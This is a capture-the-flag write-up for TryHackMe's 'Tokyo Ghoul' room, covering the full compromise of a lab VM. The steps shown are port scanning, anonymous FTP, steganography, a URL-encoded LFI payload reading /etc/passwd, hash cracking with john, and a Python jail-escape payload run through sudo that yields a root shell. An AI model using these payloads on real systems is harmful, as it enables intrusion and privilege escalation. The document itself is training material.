TryHackMe: Tokyo Ghoul by devalfo & rockyou.txt

Task 1 About the room

This room took a lot of inspiration from psychobreak , and it is based on Tokyo Ghoul anime.

Alert: This room can contain some spoilers 'only s1 and s2 ' so if you are interested to watch the anime, wait till you finish the anime and come back to do the room

The machine will take some time, just go grab some water or make a coffee.

This room contains some non-pg13 elements in the form of narrative descriptions. Please proceed only at your own comfort level.

Read the above - Done

Deploy the machine - Done

Task 2 Where am i ?

Use nmap to scan all ports

Let's break out rustscan and see how many ports we have open.

╰─⠠⠵ rustscan -a ghoul --ulimit 10000 -- -sC -sV -oA ghoul -A -v
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.217.191:[REDACTED]
.....
.....
Open 10.10.217.191:[REDACTED]

How many ports are open ?

From the above scan we see how many ports are open.

Answer: [REDACTED]

What is the OS used ?

From both ssh and apache information returned from our rustscan/nmap we can see the operating system.

Answer: [REDACTED]

Task 3 Planning to escape

Did you find the note that the others ghouls gave you? where did you find it ?

Browsing to http://ghoul we see a link at the bottom of the page that goes to [REDACTED].[REDACTED]

Answer: [REDACTED].[REDACTED]

What is the key for Rize executable?

Using view-source on the above page gives us a comment

	<!-- look don't tell jason but we will help you escape , here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there you will find a freind who will help you -->

Taking this hint we jump over to ftp and login as anonymous

╰─⠠⠵ ftp ghoul
Connected to ghoul.
220 (vsFTPd 3.0.3)
Name (ghoul:tony): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Looking around we find need_to_talk which is a binary. Let's grab with get, make it executable chmod +x and run it

╰─⠠⠵ ./need_to_talk 
Hey Kaneki finnaly you want to talk 
Unfortunately before I can give you the kagune you need to give me the paraphrase
Do you have what I'm looking for?

> 

Ok, looks like we need to enter something, running strings across the binary we can see [REDACTED] above the text

Using this we get the below

Good job. I believe this is what you came for:
[REDACTED]

Answer: [REDACTED]

Use a tool to get the other note from Rize.

Another file found on the ftp is rize_and_kaneki.jpg

Running steghide against this jpg with the key found above we get a note.

╰─⠠⠵ steghide extract -sf rize_and_kaneki.jpg 
Enter passphrase: 
wrote extracted data to "yougotme.txt".

╰─⠠⠵ cat yougotme.txt 
haha you are so smart kaneki but can you talk my code 

[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]

if you can talk it allright you got my secret directory 

Throwing this into cyberchef we get the below.

Answer: Not Needed but we note: [REDACTED]

Task 4 What Rize is trying to say?

What the message mean did you understand it ? what it says?

Taking the output from Cyber Chef from the previous question we get the answer.

Answer: [REDACTED]

Can you see the weakness in the dark ? no ? just search

Using gobuster we find the subdirectory [REDACTED]

╰─⠠⠵ gobuster -m dir -u http://ghoul/[REDACTED]/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php,zip,bak,sql,sqlite,tar,tgz,tar.gz

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://ghoul/[REDACTED]/
[+] Threads      : 10
[+] Wordlist     : /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,bak,sql,tgz,txt,sqlite,tar,tar.gz,zip
[+] Timeout      : 10s
=====================================================
2021/03/14 23:33:01 Starting gobuster
=====================================================
/[REDACTED] (Status: 301)

Answering yes or no results in being redirected to /index.php?view=flower.gif .... This smells like an lfi... Let's try ../../../../../../..//etc/passwd

Damn.... trying the usual php://filter tactic does not work either ... Lets try and URL Encode the lfi..

%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd

What did you find something ? crack it

From the above we have the password hash

[REDACTED]

what is rize username ?

From the /etc/passwd we can see the username with a password is [REDACTED]

Answer: [REDACTED]

what is rize password ?

Cracking the password above with john

╰─⠠⠵ john passwd --wordlist=rockyou.txt
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]      (?)
1g 0:00:00:04 100% 0.2183g/s 314.4p/s 314.4c/s 314.4C/s teacher..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Answer: [REDACTED]

Task 5 Fight Jason

user.txt

Using the username and password above we can ssh into the box and read the user.txt found in our home directory

[REDACTED]@vagrant:~$ cat user.txt 
[REDACTED]

Answer: [REDACTED]

root.txt

Running sudo -l we can see the below

[REDACTED]@vagrant:~$ sudo -l
[sudo] password for [REDACTED]: 
Matching Defaults entries for [REDACTED] on vagrant.vm:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User [REDACTED] may run the following commands on vagrant.vm:
    (ALL) /usr/bin/python3 /home/[REDACTED]/jail.py

Checking the permission we do not have write access on /home/[REDACTED]/jail.py so we can not just change the file

[REDACTED]@vagrant:~$ ls -l /home/[REDACTED]/jail.py
-rw-r--r-- 1 root root 588 Jan 23 22:27 /home/[REDACTED]/jail.py

Let's take a look at the python script

#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("========================================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return;
    else:
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()

Looking at the above we can not use any of our normal verbs. Doing some Insert Search Engine Verb Here I come across https://anee.me/escaping-python-jails-849c65cf306e?gi=a7d3bac81831. Looking at the escapes at the bottom of the page I modify it to the below.

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')

So let's run it...

[REDACTED]@vagrant:~$ sudo /usr/bin/python3 /home/[REDACTED]/jail.py
[sudo] password for [REDACTED]: 
Hi! Welcome to my world kaneki
========================================================================
What ? You gonna stand like a chicken ? fight me Kaneki
>>> __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')
[REDACTED]
No Kaneki you are so dead
[REDACTED]@vagrant:~$ 

Answer: [REDACTED]

Of course we could also modify it to give us a root shell using the following:

__builtins__.__dict__['__IMPORT__'.lower()]('PTY'.lower()).__dict__['SPAWN'.lower()]('/bin/bash')
[REDACTED]@vagrant:~$ sudo /usr/bin/python3 /home/[REDACTED]/jail.py
Hi! Welcome to my world kaneki
========================================================================
What ? You gonna stand like a chicken ? fight me Kaneki
>>> __builtins__.__dict__['__IMPORT__'.lower()]('PTY'.lower()).__dict__['SPAWN'.lower()]('/bin/bash')
root@vagrant:~# 

Task 6 Special thanks

You can contact me on my discord : 0UR4N05#6231

Congratulations you've complete Tokyo ghoul room 1. This is the first room I've ever created so If you enjoyed it please give me a follow up on twitter and send me your feedback in twitter or discord , and i'll be so grateful if you like this room and share it with your friends , thank you .

Thank you

Answer: Not needed

Done

BOOM!!!!, another room completed. Was good fun and required a mix of skills to get to the root flag. Also found an unintended which I reported to the room creator.

Unintended Root

The server was built using vagrant and this default user was left there with sudo

vagrant@vagrant:~$ sudo -l
Matching Defaults entries for vagrant on vagrant.vm:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on vagrant.vm:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Using this user we can gain a root shell using sudo -i and read /root/root.txt

root@vagrant:~# cat /root/root.txt 
[REDACTED]